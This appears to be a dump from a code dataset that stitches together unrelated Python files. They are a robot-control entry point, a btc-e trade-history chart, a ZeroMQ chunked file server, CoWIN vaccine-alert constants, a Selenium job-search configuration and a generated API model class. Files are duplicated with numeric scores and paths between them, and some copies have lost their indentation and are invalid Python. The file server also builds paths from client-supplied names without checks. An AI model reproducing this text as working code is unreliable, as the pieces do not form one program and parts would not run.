# values -- TODO confirm against Configuration's documentation).
CONFIG = Configuration(
    initial_position=Vector2(200, 1200),
    initial_angle=0,
    robot_width=380,
    robot_length=240,
    field_shape=(3000, 2000),
    color=Color.BLUE,
    wheel_radius=73.8 / 2,
    encoder_ticks_per_revolution=2400,
    distance_between_wheels=364.26,  # old: 357
    encoder_update_rate=100,
    motor_update_rate=1000,
    # Fixed-point scale used when sending PID gains to the motor board.
    pid_scale_factor=2**16,
    max_wheel_speed=600,
    max_wheel_acceleration=1000,
    max_angular_velocity=1.0 * math.pi,
    max_angular_acceleration=1.4 * math.pi,
    tolerance_distance=1,
    tolerance_angle=0.01,
    trapezoid_anticipation=1.1,
    # Debug web server (websocket stream + HTTP UI), bound on all interfaces.
    debug=DebugConfiguration(
        websocket_port=8080,
        http_port=9090,
        host='0.0.0.0',
        refresh_rate=4,
    ),
    pid_constants_distance=PIDConstants(10, 0, 0),
    pid_constants_angle=PIDConstants(10, 0, 0),
    pid_constants_position_left=PIDConstants(2, 0.0, 1.5),
    pid_constants_position_right=PIDConstants(2, 0.0, 1.5),
    pid_constants_speed_left=PIDConstants(0.39, 2.0, 0.0018),
    pid_constants_speed_right=PIDConstants(0.39, 2.0, 0.0018),
    pid_limits_distance=PIDLimits(1e2, 1e2, 0.0),
    pid_limits_angle=PIDLimits(4.0, 4.0, 0.000),
)
# Simulation parameters; the four obstacle segments are the field walls
# derived from CONFIG.field_shape.
SIMULATION_CONFIG = SimulationConfiguration(
    speed_factor=1e100,  # Run the simulation as fast as possible.
    tickrate=100,
    replay_fps=60,
    lidar_position_rate=11,
    obstacles=[
        # Left, bottom, top and right walls of the field.
        Segment(start=Vector2(0, 0), end=Vector2(0, CONFIG.field_shape[1])),
        Segment(start=Vector2(0, 0), end=Vector2(CONFIG.field_shape[0], 0)),
        Segment(start=Vector2(*CONFIG.field_shape),
                end=Vector2(0, CONFIG.field_shape[1])),
        Segment(start=Vector2(*CONFIG.field_shape),
                end=Vector2(CONFIG.field_shape[0], 0)),
    ])
async def _get_container(simulation: bool, stub_lidar: bool,
                         stub_socket_can: bool) -> DependencyContainer:
    """
    Build the dependency container.

    simulation: register the simulated gateway, clock and runner instead of
        the real hardware adapters.
    stub_lidar: replace the RPLIDAR driver with the simulated adapter.
    stub_socket_can: replace the ISOTP CAN sockets with loopback adapters.
    """
    i = DependencyContainer()
    i.provide('configuration', CONFIG)
    i.provide('protobuf_router', ProtobufRouter)
    i.provide('odometry_function', lambda: odometry_arc)
    i.provide('position_controller', PositionController)
    i.provide('motor_gateway', MotorGateway)
    i.provide('motion_controller', MotionController)
    i.provide('trajectory_controller', TrajectoryController)
    i.provide('strategy_controller', StrategyController)
    i.provide('symmetry_controller', SymmetryController)
    i.provide('obstacle_controller', ObstacleController)
    i.provide('debug_controller', DebugController)
    i.provide('match_action_controller', MatchActionController)
    i.provide('probe', Probe)
    i.provide('event_loop', asyncio.get_event_loop())
    i.provide('http_client', HTTPClient)
    i.provide('web_browser_client', WebBrowserClient)
    i.provide('replay_saver', ReplaySaver)
    # Simulation-only dependencies, plus a fake clock so simulated time can
    # run faster than wall-clock time.
    if simulation:
        i.provide('simulation_configuration', SIMULATION_CONFIG)
        i.provide('simulation_router', SimulationRouter)
        i.provide('simulation_runner', SimulationRunner)
        i.provide(
            'simulation_state',
            SimulationState(time=0,
                            cups=[],
                            left_tick=0,
                            right_tick=0,
                            left_speed=0,
                            right_speed=0,
                            queue_speed_left=deque(),
                            queue_speed_right=deque(),
                            last_position_update=0,
                            last_lidar_update=0))
        i.provide('simulation_gateway', SimulationGateway)
        i.provide('clock', FakeClock)
    else:
        i.provide('clock', RealClock)
    # LIDAR: simulated when simulating or explicitly stubbed, otherwise the
    # first serial port found is assumed to be the RPLIDAR device.
    if simulation or stub_lidar:
        i.provide('lidar_adapter', SimulatedLIDARAdapter)
    else:
        rplidar_obj = rplidar.RPLidar(list_ports.comports()[0].device)
        i.provide('rplidar_object', rplidar_obj)
        i.provide('lidar_adapter', RPLIDARAdapter)
    # CAN sockets: loopback stubs or real ISOTP sockets, one per servo board
    # plus one for the motor board.
    servo_adapter_list: List[SocketAdapter] = []
    if simulation or stub_socket_can:
        i.provide('motor_board_adapter', LoopbackSocketAdapter)
        for _ in range(NB_SERVO_BOARDS):
            servo_adapter_list.append(LoopbackSocketAdapter())
    else:
        i.provide('motor_board_adapter',
                  ISOTPSocketAdapter,
                  address=NET_ADDRESS_MOTOR,
                  adapter_name='motor_board')
        for index in range(NB_SERVO_BOARDS):
            servo_adapter_list.append(
                ISOTPSocketAdapter(address=NET_ADDRESSES_SERVO[index],
                                   adapter_name="servo_board_" + str(index)))
    i.provide('servo_adapters_list', servo_adapter_list)
    i.provide('actuator_gateway', ActuatorGateway)
    i.provide('actuator_controller', ActuatorController)
    return i
# pylint: disable=too-many-locals
async def main() -> None:
    """Program entry point.

    Reads configuration from environment variables, builds the dependency
    container, wires the adapters to their controllers, then runs every
    long-lived coroutine until the first one finishes (normally or with an
    error), cancels the rest and saves the replay.
    """
    is_simulation = os.environ.get('OUTECH_SIMULATION',
                                   'true').lower() == 'true'
    stub_lidar = os.environ.get('STUB_LIDAR', 'false').lower() == 'true'
    stub_socket_can = os.environ.get('STUB_SOCKET_CAN',
                                     'false').lower() == 'true'

    i = await _get_container(is_simulation, stub_lidar, stub_socket_can)

    # Setup adapters.
    lidar_adapter: LIDARAdapter = i.get('lidar_adapter')
    obstacle_controller: ObstacleController = i.get('obstacle_controller')
    lidar_adapter.register_callback(obstacle_controller.set_detection)

    motor_board_adapter: SocketAdapter = i.get('motor_board_adapter')
    servo_board_adapters: List[SocketAdapter] = i.get('servo_adapters_list')
    # BUG FIX: motor_board_adapter.init() was previously awaited a second
    # time further down; each adapter is now initialized exactly once.
    await motor_board_adapter.init()
    for adapter in servo_board_adapters:
        await adapter.init()

    # Register the CAN bus to call the router.
    protobuf_router: ProtobufRouter = i.get('protobuf_router')
    motor_board_adapter.register_callback(protobuf_router.decode_message)
    if is_simulation:
        simulation_router: SimulationRouter = i.get('simulation_router')
        motor_board_adapter.register_callback(
            simulation_router.handle_movement_order)

    strategy_controller = i.get('strategy_controller')
    debug_controller = i.get('debug_controller')

    coroutines_to_run = {
        strategy_controller.run(),
        debug_controller.run(),
        motor_board_adapter.run(),
        print_performance_metrics(),
    }
    if is_simulation:
        simulation_runner = i.get('simulation_runner')
        coroutines_to_run.add(simulation_runner.run())

    done, pending = await asyncio.wait(coroutines_to_run,
                                       return_when=asyncio.FIRST_COMPLETED)

    # Gather the done coroutines to have proper stacktraces.
    await asyncio.gather(*done)

    # Cancel every coroutine that has not stopped yet.
    gather = asyncio.gather(*pending)
    gather.cancel()
    try:
        await gather
    except asyncio.CancelledError:
        pass

    replay_saver = i.get('replay_saver')
    replay_saver.save_replay()
if __name__ == '__main__':
asyncio.run(main()) | 0.578686 | 0.190611 |
import sys
import matplotlib
import wx
matplotlib.use("WXAgg")
matplotlib.rcParams['toolbar'] = 'None'
import matplotlib.pyplot as plt
import pylab
import btceapi
class Chart(object):
    """Live scatter chart of recent trades for one btc-e currency pair.

    Polls the public trade history every 10 seconds and plots bids (red)
    and asks (green) over time inside a wx/matplotlib window.
    """

    def __init__(self, symbol):
        self.symbol = symbol
        self.base = symbol.split("_")[0].upper()
        self.alt = symbol.split("_")[1].upper()
        self.ticks = btceapi.getTradeHistory(self.symbol)
        # Highest trade id seen so far; 0 when no history is available yet.
        # BUG FIX: max() on an empty history raised ValueError.
        self.last_tid = max((t.tid for t in self.ticks), default=0)
        self.fig = plt.figure()
        self.axes = self.fig.add_subplot(111)
        self.bid_line, = self.axes.plot(*zip(*self.bid),
            linestyle='None', marker='o', color='red')
        self.ask_line, = self.axes.plot(*zip(*self.ask),
            linestyle='None', marker='o', color='green')
        self.axes.grid()
        self.fig.canvas.draw()
        self.timer_id = wx.NewId()
        self.actor = self.fig.canvas.manager.frame
        self.timer = wx.Timer(self.actor, id=self.timer_id)
        self.timer.Start(10000)  # update every 10 seconds
        # BUG FIX: the legacy call form wx.EVT_TIMER(handler, id, fn) was
        # removed in wxPython Phoenix; Bind() is the supported binding API.
        self.actor.Bind(wx.EVT_TIMER, self.update, self.timer)
        pylab.show()

    @property
    def bid(self):
        """(timestamp, price) pairs for all buy-side trades seen so far."""
        return [(t.timestamp, t.price) for t in self.ticks if t.type == u'bid']

    @property
    def ask(self):
        """(timestamp, price) pairs for all sell-side trades seen so far."""
        return [(t.timestamp, t.price) for t in self.ticks if t.type == u'ask']

    def update(self, event):
        """Timer callback: fetch new trades, print them, and redraw."""
        ticks = btceapi.getTradeHistory(self.symbol)
        # Filter the fresh batch once instead of scanning it twice.
        new_ticks = [t for t in ticks if t.tid > self.last_tid]
        self.ticks += new_ticks
        for t in new_ticks:
            print("%s: %s %f at %s %f" %
                (t.type, self.base, t.amount, self.alt, t.price))
        # BUG FIX: max() raised ValueError when the poll returned no trades;
        # keep the previous high-water mark in that case.
        self.last_tid = max((t.tid for t in ticks), default=self.last_tid)

        x, y = zip(*self.bid)
        self.bid_line.set_xdata(x)
        self.bid_line.set_ydata(y)

        x, y = zip(*self.ask)
        self.ask_line.set_xdata(x)
        self.ask_line.set_ydata(y)

        pylab.gca().relim()
        pylab.gca().autoscale_view()
        self.fig.canvas.draw()
if __name__ == "__main__":
    # Use the pair given on the command line, defaulting to BTC/USD.
    symbol = sys.argv[1] if len(sys.argv) > 1 else "btc_usd"
chart = Chart(symbol) | samples/watch.py | import sys
import matplotlib
import wx
matplotlib.use("WXAgg")
matplotlib.rcParams['toolbar'] = 'None'
import matplotlib.pyplot as plt
import pylab
import btceapi
class Chart(object):
# Live scatter plot of recent trades for one btc-e currency pair:
# bids are drawn in red, asks in green, refreshed by a wx timer.
def __init__(self, symbol):
self.symbol = symbol
# Currency pair "base_alt", e.g. "btc_usd" -> base BTC, alt USD.
self.base = symbol.split("_")[0].upper()
self.alt = symbol.split("_")[1].upper()
self.ticks = btceapi.getTradeHistory(self.symbol)
# Highest trade id seen so far, used to skip already-seen trades.
# NOTE(review): max() raises ValueError if the history is empty --
# confirm the API always returns at least one trade.
self.last_tid = max([t.tid for t in self.ticks])
self.fig = plt.figure()
self.axes = self.fig.add_subplot(111)
# One line artist per side; update() rewrites their data in place.
self.bid_line, = self.axes.plot(*zip(*self.bid),
linestyle='None', marker='o', color='red')
self.ask_line, = self.axes.plot(*zip(*self.ask),
linestyle='None', marker='o', color='green')
self.axes.grid()
self.fig.canvas.draw()
self.timer_id = wx.NewId()
self.actor = self.fig.canvas.manager.frame
self.timer = wx.Timer(self.actor, id=self.timer_id)
self.timer.Start(10000) # update every 10 seconds
# NOTE(review): calling wx.EVT_TIMER(...) is the legacy (classic wx)
# binding style; wxPython Phoenix requires actor.Bind(wx.EVT_TIMER, ...).
wx.EVT_TIMER(self.actor, self.timer_id, self.update)
pylab.show()
@property
def bid(self):
# (timestamp, price) pairs of all buy-side trades collected so far.
return [(t.timestamp, t.price) for t in self.ticks if t.type == u'bid']
@property
def ask(self):
# (timestamp, price) pairs of all sell-side trades collected so far.
return [(t.timestamp, t.price) for t in self.ticks if t.type == u'ask']
def update(self, event):
# Timer callback: fetch the latest history, append unseen trades,
# log them to stdout and redraw both scatter series.
ticks = btceapi.getTradeHistory(self.symbol)
self.ticks += [t for t in ticks if t.tid > self.last_tid]
for t in ticks:
if t.tid > self.last_tid:
print("%s: %s %f at %s %f" %
(t.type, self.base, t.amount, self.alt, t.price))
# NOTE(review): raises ValueError if this poll returned no trades.
self.last_tid = max([t.tid for t in ticks])
x, y = zip(*self.bid)
self.bid_line.set_xdata(x)
self.bid_line.set_ydata(y)
x, y = zip(*self.ask)
self.ask_line.set_xdata(x)
self.ask_line.set_ydata(y)
# Recompute data limits and rescale the axes before redrawing.
pylab.gca().relim()
pylab.gca().autoscale_view()
self.fig.canvas.draw()
if __name__ == "__main__":
    # First CLI argument selects the pair; fall back to "btc_usd".
    symbol = "btc_usd" if len(sys.argv) < 2 else sys.argv[1]
chart = Chart(symbol) | 0.38168 | 0.203411 |
import time
import zmq
import hashlib
import os
import json
NAME_DATAFILE = "dataFiles.json" # JSON mapping a file's global hash to its list of chunk hashes
information_dict = {}
NAME_NAMEFILES = "nameFiles.json" # JSON mapping a file name to its global hash
names_dict = {}
# Load both indexes at import time; the JSON files must already exist.
with open(NAME_DATAFILE, "r") as dataFiles:
information_dict = json.load(dataFiles)
with open(NAME_NAMEFILES, "r") as dataFiles:
names_dict = json.load(dataFiles)
def extraerHash(data):
    """Return the hex SHA-1 digest of *data* (bytes)."""
    return hashlib.sha1(data).hexdigest()
def saveFile(data, hashName):
    """Write *data* (bytes) into the chunk store under its hash name."""
    path = "archivos/" + hashName
    with open(path, "wb") as out:
        out.write(data)
def updateJson(nameFile, jsonObj):
    """Persist *jsonObj* as JSON to *nameFile*, overwriting it."""
    with open(nameFile, "w") as handle:
        json.dump(jsonObj, handle)
def downloadFile(message, socket):
# Stream a stored file back to the client chunk by chunk.
# message[1] holds the requested file name (utf-8 bytes).
nameFile = message[1].decode("utf-8")
if nameFile not in names_dict:
# Unknown file: reply once and stop ("No existe" = "does not exist").
socket.send_multipart([b"No existe", b"i"])
else:
# Map: name -> global hash -> ordered list of chunk hashes.
hash_global = names_dict[nameFile]
hashes_part = information_dict[hash_global]
for hash in hashes_part:
with open("archivos/" + hash, "rb") as f:
data = f.read()
# REP sockets must alternate send/recv strictly, so wait for the
# client's ack after every chunk before sending the next one.
socket.send_multipart([b"sending", data])
socket.recv_string()
socket.send_multipart([b"end", b"i"])
def uploadFile(message, socket):
# Store one uploaded chunk. Frames: [action, file name, global hash,
# chunk hash, chunk bytes, "True" if this is the file's first chunk].
nameFile = message[1].decode("utf-8")
bigHash = message[2].decode("utf-8")
hashFile = message[3].decode("utf-8")
data = message[4]
firstPart = message[5].decode("utf-8")
if firstPart == "True":
if bigHash in information_dict:
# Same content already stored ("Archivo duplicado" = duplicate file).
socket.send_string("Archivo duplicado")
else:
if nameFile in names_dict:
# A different file already uses this name.
socket.send_string("Ya existe un archivo con este nombre")
else:
# First chunk of a new file: create both index entries, persist
# them, then write the chunk itself.
names_dict[nameFile] = bigHash
information_dict[bigHash] = [hashFile]
updateJson(NAME_NAMEFILES, names_dict)
updateJson(NAME_DATAFILE, information_dict)
saveFile(data, hashFile)
socket.send_string("Saved")
else:
# Subsequent chunk: append its hash to the file's chunk list.
information_dict[bigHash].append(hashFile)
updateJson(NAME_DATAFILE, information_dict)
saveFile(data, hashFile)
socket.send_string("Saved")
if __name__ == "__main__":
# REP socket: strictly alternates recv (request) / send (reply).
context = zmq.Context()
socket = context.socket(zmq.REP)
socket.bind("tcp://*:5555")
# NOTE(review): accion / nombreArchivo are never used below.
accion = ""
nombreArchivo = ""
while True:
# Wait for next request from client
message = socket.recv_multipart()
# First frame selects the operation: upload / download / list names.
action = message[0].decode("utf-8")
#print("Action: ", action)
if action == "upload":
uploadFile(message, socket)
elif action == "download":
downloadFile(message, socket)
else:
# Any other action: reply with a newline-separated file listing.
list_names = ""
for name in names_dict:
list_names += name + "\n"
socket.send_string(list_names[:-1]) | manejador_archivos/manejador_archivos_CS/servidor/server.py | import time
import zmq
import hashlib
import os
import json
NAME_DATAFILE = "dataFiles.json" # JSON index: global file hash -> list of chunk hashes
information_dict = {}
NAME_NAMEFILES = "nameFiles.json" # JSON index: file name -> global file hash
names_dict = {}
# Both index files are read once at import time and kept in memory.
with open(NAME_DATAFILE, "r") as dataFiles:
information_dict = json.load(dataFiles)
with open(NAME_NAMEFILES, "r") as dataFiles:
names_dict = json.load(dataFiles)
def extraerHash(data):
    """Compute the SHA-1 of *data* and return it as a hex string."""
    digest = hashlib.sha1(data)
    return digest.hexdigest()
def saveFile(data, hashName):
# Persist one chunk of bytes in the local "archivos/" store, named by its hash.
with open("archivos/" + hashName, "wb") as f:
f.write(data)
def updateJson(nameFile, jsonObj):
# Overwrite *nameFile* with the JSON serialization of *jsonObj*.
with open(nameFile, "w") as f:
f.write(json.dumps(jsonObj))
def downloadFile(message, socket):
# Send the requested file's chunks one by one; the client acks each chunk.
nameFile = message[1].decode("utf-8")
if nameFile not in names_dict:
# "No existe" = the requested name is not in the index.
socket.send_multipart([b"No existe", b"i"])
else:
hash_global = names_dict[nameFile]
hashes_part = information_dict[hash_global]
for hash in hashes_part:
with open("archivos/" + hash, "rb") as f:
data = f.read()
# Alternate send/recv to respect the REP socket state machine.
socket.send_multipart([b"sending", data])
socket.recv_string()
socket.send_multipart([b"end", b"i"])
def uploadFile(message, socket):
# Store one uploaded chunk; message frames are
# [action, name, global hash, chunk hash, bytes, first-chunk flag].
nameFile = message[1].decode("utf-8")
bigHash = message[2].decode("utf-8")
hashFile = message[3].decode("utf-8")
data = message[4]
firstPart = message[5].decode("utf-8")
if firstPart == "True":
if bigHash in information_dict:
# Identical content already stored.
socket.send_string("Archivo duplicado")
else:
if nameFile in names_dict:
# Name collision with a different file.
socket.send_string("Ya existe un archivo con este nombre")
else:
# New file: register both indexes, persist them, store the chunk.
names_dict[nameFile] = bigHash
information_dict[bigHash] = [hashFile]
updateJson(NAME_NAMEFILES, names_dict)
updateJson(NAME_DATAFILE, information_dict)
saveFile(data, hashFile)
socket.send_string("Saved")
else:
# Follow-up chunk of an already-registered file.
information_dict[bigHash].append(hashFile)
updateJson(NAME_DATAFILE, information_dict)
saveFile(data, hashFile)
socket.send_string("Saved")
if __name__ == "__main__":
# Single-threaded file server: one REP socket, one request at a time.
context = zmq.Context()
socket = context.socket(zmq.REP)
socket.bind("tcp://*:5555")
# NOTE(review): these two variables are unused.
accion = ""
nombreArchivo = ""
while True:
# Wait for next request from client
message = socket.recv_multipart()
action = message[0].decode("utf-8")
#print("Action: ", action)
if action == "upload":
uploadFile(message, socket)
elif action == "download":
downloadFile(message, socket)
else:
# Default action: build a newline-separated listing of stored names.
list_names = ""
for name in names_dict:
list_names += name + "\n"
socket.send_string(list_names[:-1]) | 0.029396 | 0.08141 |
import os
COWIN_URL = os.getenv('COWIN_URL')  # base URL; the f-strings below concatenate directly, so it must end with '/'
STATES_URL = f'{COWIN_URL}admin/location/states/'
DISTRICTS_URL = f'{COWIN_URL}admin/location/districts/'
CALENDAR_BY_DISTRICT_PUBLIC_URL = f'{COWIN_URL}appointment/sessions/public/calendarByDistrict/'
CALENDAR_BY_DISTRICT_URL = f'{COWIN_URL}appointment/sessions/calendarByDistrict/'
FIND_BY_DISTRICT_URL = f'{COWIN_URL}appointment/sessions/public/findByDistrict'
GOOGLE_GEOCODE_URL = 'https://maps.googleapis.com/maps/api/geocode/json'
GMAPS_API_KEY = os.getenv('GCP_API_KEY')
# Vaccine filter values (lower-case).
BOTH = 'both'
COVISHIELD = 'covishield'
COVAXIN = 'covaxin'
SPUTNIK = 'sputnik v'
# Internal age-group identifiers ...
ABOVE_18 = 'above_18'
ABOVE_45 = 'above_45'
# ... and their CoWIN-side counterparts.
ABOVE_18_COWIN = '18'
ABOVE_45_COWIN = '45'
WEBSITE_URL = os.getenv('WEBSITE_URL')
DB_NAME = os.getenv('DB_NAME')
ISSUE_MSG = 'There was an issue with your request, please contact the developers'
NUM_WEEKS = 1  # presumably the number of calendar weeks fetched -- confirm at usage site
EMAIL_SUBJECT = '%s vaccine slots available at %s - %s!'
EMAIL_BODY = f"""<html>
<body>
<p>New vaccine slot available!<br>
%s in %s on %s
</p>
<p>
Age group: %s
Vaccine: %s
</p>
<p>
Complete Address: %s<br>
Pincode %s
</p>
<p>
Cost: %s
</p>
<p>
Slots: %s
</p>
</body>
<p>
To unsubscribe from further notifications, please click here: {WEBSITE_URL}/unsubscribe?email=%s&token=%s
</p>
</html>"""
VERIFY_SUBJECT = 'Please verify your email'
VERIFY_EMAIL_BODY = f"""<html>
<body>
<p>Please verify your email here: {WEBSITE_URL}/verify_email?email=%s&token=%s
</p>
</body>
</html>"""
TEMPLATE_DATA = f"""{{
"center_name": "%s",
"slots": "%s",
"district_name": "%s",
"date": "%s",
"age_group": "%s",
"vaccine": "%s",
"address": "%s",
"pincode": "%s",
"unsub_endpoint": "%s",
"capacity": "%s",
"capacity_dose_1": "%s",
"capacity_dose_2": "%s",
"fee_amount": "%s"
}}"""
TEMPLATE_DATA_PINCODE = f"""{{
"email": "%s",
"unsub_endpoint": "%s"
}}"""
UNSUB_ENDPOINT = f"{WEBSITE_URL}/unsubscribe?email=%s&token=%s" | helpers/constants.py | import os
COWIN_URL = os.getenv('COWIN_URL')  # must include a trailing '/': endpoint strings append directly
STATES_URL = f'{COWIN_URL}admin/location/states/'
DISTRICTS_URL = f'{COWIN_URL}admin/location/districts/'
CALENDAR_BY_DISTRICT_PUBLIC_URL = f'{COWIN_URL}appointment/sessions/public/calendarByDistrict/'
CALENDAR_BY_DISTRICT_URL = f'{COWIN_URL}appointment/sessions/calendarByDistrict/'
FIND_BY_DISTRICT_URL = f'{COWIN_URL}appointment/sessions/public/findByDistrict'
GOOGLE_GEOCODE_URL = 'https://maps.googleapis.com/maps/api/geocode/json'
GMAPS_API_KEY = os.getenv('GCP_API_KEY')
# Vaccine name filters.
BOTH = 'both'
COVISHIELD = 'covishield'
COVAXIN = 'covaxin'
SPUTNIK = 'sputnik v'
# Age-group identifiers: internal form and CoWIN form.
ABOVE_18 = 'above_18'
ABOVE_45 = 'above_45'
ABOVE_18_COWIN = '18'
ABOVE_45_COWIN = '45'
WEBSITE_URL = os.getenv('WEBSITE_URL')
DB_NAME = os.getenv('DB_NAME')
ISSUE_MSG = 'There was an issue with your request, please contact the developers'
NUM_WEEKS = 1  # presumably weeks of calendar data to scan -- confirm
EMAIL_SUBJECT = '%s vaccine slots available at %s - %s!'
EMAIL_BODY = f"""<html>
<body>
<p>New vaccine slot available!<br>
%s in %s on %s
</p>
<p>
Age group: %s
Vaccine: %s
</p>
<p>
Complete Address: %s<br>
Pincode %s
</p>
<p>
Cost: %s
</p>
<p>
Slots: %s
</p>
</body>
<p>
To unsubscribe from further notifications, please click here: {WEBSITE_URL}/unsubscribe?email=%s&token=%s
</p>
</html>"""
VERIFY_SUBJECT = 'Please verify your email'
VERIFY_EMAIL_BODY = f"""<html>
<body>
<p>Please verify your email here: {WEBSITE_URL}/verify_email?email=%s&token=%s
</p>
</body>
</html>"""
TEMPLATE_DATA = f"""{{
"center_name": "%s",
"slots": "%s",
"district_name": "%s",
"date": "%s",
"age_group": "%s",
"vaccine": "%s",
"address": "%s",
"pincode": "%s",
"unsub_endpoint": "%s",
"capacity": "%s",
"capacity_dose_1": "%s",
"capacity_dose_2": "%s",
"fee_amount": "%s"
}}"""
TEMPLATE_DATA_PINCODE = f"""{{
"email": "%s",
"unsub_endpoint": "%s"
}}"""
UNSUB_ENDPOINT = f"{WEBSITE_URL}/unsubscribe?email=%s&token=%s" | 0.182025 | 0.056574 |
import os
from engines import peregrinbase
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class SeleniumWebForm(peregrinbase.PeregrinBase):
"""Peregrin engine that drives a website's search form via Selenium
and reads the result listings back into the Peregrin DB.
NOTE(review): the previous docstring said "read an RSS feed", which
appears copy-pasted from another engine and did not match this class.
"""
def __init__(self):
super().__init__()
# Engine metadata consumed by the Peregrin framework.
self._title = 'Selenium Web Form and Result Reader'
self._version = '0.1'
self._descr = 'Selenium class for Peregrin.'
self._engine_id = -1  # presumably "not yet assigned" -- confirm against PeregrinBase
self._state = 'Initialized'
def actions(self):
""" Returns a list of action and state this object can perform...
These are in a form that Peregrin can handle, and are use
by the class to limit what it allows Peregrin to call.
"""
self._actions['getItems'] = ('search', None)
return self._actions
def getItems(self):
# TODO: not implemented yet.
pass
def getResults(self, uri):
# TODO: not implemented yet.
pass
if __name__ == '__main__':
    import sys

    # Assemble the configuration dictionary Peregrin expects.
    config_data = {}
    modPath = os.path.dirname(__file__)
    config_data['path'] = os.path.split(modPath)[0]
    config_data['name'] = 'SeleniumWebForm'
    config_data['module'] = sys.modules[__name__]
    config_data['db'] = {'path': 'db', 'name': 'PeregrinDB.py'}
    config_data['config'] = {'path': 'config', 'name': 'PeregrinDaemon.cfg'}

    # Load class specific items: one search record per keyword.
    cls_name = 'SeleniumWebForm'
    keywords = [
        'business intelligence',
        'database',
        'project management',
        'software engineer',
        'strategic',
        'business analysis',
        'software selection',
        'erp implementation',
        'system integration',
        'quality assurance',
        'User experience UX',
        'data dataops',
        'dev ops devops',
        'fun energetic',
        'project coordination',
        'salesforce',
    ]
    config_data[cls_name] = {
        'uri': 'http://www.bctechnology.com/jobs/search.cfm',
        'data': [{'name': 'keyword', 'value': kw, 'id': idx}
                 for idx, kw in enumerate(keywords)],
    }

    func_name = 'getItems'
    config_data[cls_name][func_name] = {
        'form': {
            'name': 'frm1',
            'formfields': [{'id': 'keyword', 'values': '{data:keyword}'}],
        },
        'results': {
            'result': {
                'type': 'selector',
                'name': 'class',
                'value': 'darkgold',
                'map': [
                    {'name': 'href',
                     'value': '{params:showid}',
                     'type': 'url',
                     'label': 'JobId'},
                    {'name': 'title',
                     'type': 'attr',
                     'label': 'JobTitle'},
                ],
                'check': [
                    {'type': 'attr',
                     'name': 'id',
                     'value': 'job-title-link'},
                ],
            },
            'nextlink': {'text': 'Next ', 'type': 'a'},
        },
    }

    func_name = 'getResults'
    config_data[cls_name][func_name] = {}
peregrinbase.main(config_data) | engines/seleniumwebform.py | import os
from engines import peregrinbase
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class SeleniumWebForm(peregrinbase.PeregrinBase):
    """Peregrin engine that submits a web search form with Selenium
    and collects the results for the Peregrin DB."""

    def __init__(self):
        super().__init__()
        # Engine metadata read by the Peregrin framework.
        self._title = 'Selenium Web Form and Result Reader'
        self._version = '0.1'
        self._descr = 'Selenium class for Peregrin.'
        self._engine_id = -1
        self._state = 'Initialized'

    def actions(self):
        """Register and return the actions Peregrin may invoke on this
        engine; the framework only calls what is listed here."""
        self._actions['getItems'] = ('search', None)
        return self._actions

    def getItems(self):
        # Not implemented yet.
        pass

    def getResults(self, uri):
        # Not implemented yet.
        pass
if __name__ == '__main__':
    import sys

    # Build the configuration mapping consumed by peregrinbase.main().
    config_data = {}
    modPath = os.path.dirname(__file__)
    config_data['path'] = os.path.split(modPath)[0]
    config_data['name'] = 'SeleniumWebForm'
    config_data['module'] = sys.modules[__name__]
    config_data['db'] = {}
    config_data['db']['path'] = 'db'
    config_data['db']['name'] = 'PeregrinDB.py'
    config_data['config'] = {}
    config_data['config']['path'] = 'config'
    config_data['config']['name'] = 'PeregrinDaemon.cfg'

    # Engine-specific settings: target URI plus one record per search term.
    cls_name = 'SeleniumWebForm'
    search_terms = ['business intelligence', 'database', 'project management',
                    'software engineer', 'strategic', 'business analysis',
                    'software selection', 'erp implementation',
                    'system integration', 'quality assurance',
                    'User experience UX', 'data dataops', 'dev ops devops',
                    'fun energetic', 'project coordination', 'salesforce']
    config_data[cls_name] = {}
    config_data[cls_name]['uri'] = 'http://www.bctechnology.com/jobs/search.cfm'
    config_data[cls_name]['data'] = [
        {'name': 'keyword', 'value': term, 'id': position}
        for position, term in enumerate(search_terms)
    ]

    func_name = 'getItems'
    config_data[cls_name][func_name] = {}
    config_data[cls_name][func_name]['form'] = {
        'name': 'frm1',
        'formfields': [{'id': 'keyword', 'values': '{data:keyword}'}]}
    config_data[cls_name][func_name]['results'] = {
        'result': {
            'type': 'selector',
            'name': 'class',
            'value': 'darkgold',
            'map': [
                {'name': 'href',
                 'value': '{params:showid}',
                 'type': 'url',
                 'label': 'JobId'},
                {'name': 'title',
                 'type': 'attr',
                 'label': 'JobTitle'}
            ],
            'check': [
                {'type': 'attr',
                 'name': 'id',
                 'value': 'job-title-link'}
            ]
        },
        'nextlink': {'text': 'Next ', 'type': 'a'}
    }

    func_name = 'getResults'
    config_data[cls_name][func_name] = {}
peregrinbase.main(config_data) | 0.349311 | 0.075961 |
import pprint
import re # noqa: F401
import six
class Member(object):
"""
Attributes:
mx_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
mx_types = {
'aggregated_at': 'str',
'connection_status': 'str',
'guid': 'str',
'identifier': 'str',
'institution_code': 'str',
'is_being_aggregated': 'bool',
'metadata': 'str',
'name': 'str',
'status': 'str',
'successfully_aggregated_at': 'str',
'user_guid': 'str'
}
attribute_map = {
'aggregated_at': 'aggregated_at',
'connection_status': 'connection_status',
'guid': 'guid',
'identifier': 'identifier',
'institution_code': 'institution_code',
'is_being_aggregated': 'is_being_aggregated',
'metadata': 'metadata',
'name': 'name',
'status': 'status',
'successfully_aggregated_at': 'successfully_aggregated_at',
'user_guid': 'user_guid'
}
def __init__(self, aggregated_at=None, connection_status=None, guid=None, identifier=None, institution_code=None, is_being_aggregated=None, metadata=None, name=None, status=None, successfully_aggregated_at=None, user_guid=None):  # noqa: E501
    """Initialise a Member; unset attributes stay None."""
    # Back every declared attribute with a private None-initialised slot.
    for attr_name in self.mx_types:
        setattr(self, '_' + attr_name, None)
    self.discriminator = None
    # Route supplied values through the property setters, skipping None.
    provided = {
        'aggregated_at': aggregated_at,
        'connection_status': connection_status,
        'guid': guid,
        'identifier': identifier,
        'institution_code': institution_code,
        'is_being_aggregated': is_being_aggregated,
        'metadata': metadata,
        'name': name,
        'status': status,
        'successfully_aggregated_at': successfully_aggregated_at,
        'user_guid': user_guid,
    }
    for attr_name, value in provided.items():
        if value is not None:
            setattr(self, attr_name, value)
@property
def aggregated_at(self):
"""Gets the aggregated_at of this Member. # noqa: E501
:return: The aggregated_at of this Member. # noqa: E501
:rtype: str
"""
return self._aggregated_at
@aggregated_at.setter
def aggregated_at(self, aggregated_at):
"""Sets the aggregated_at of this Member.
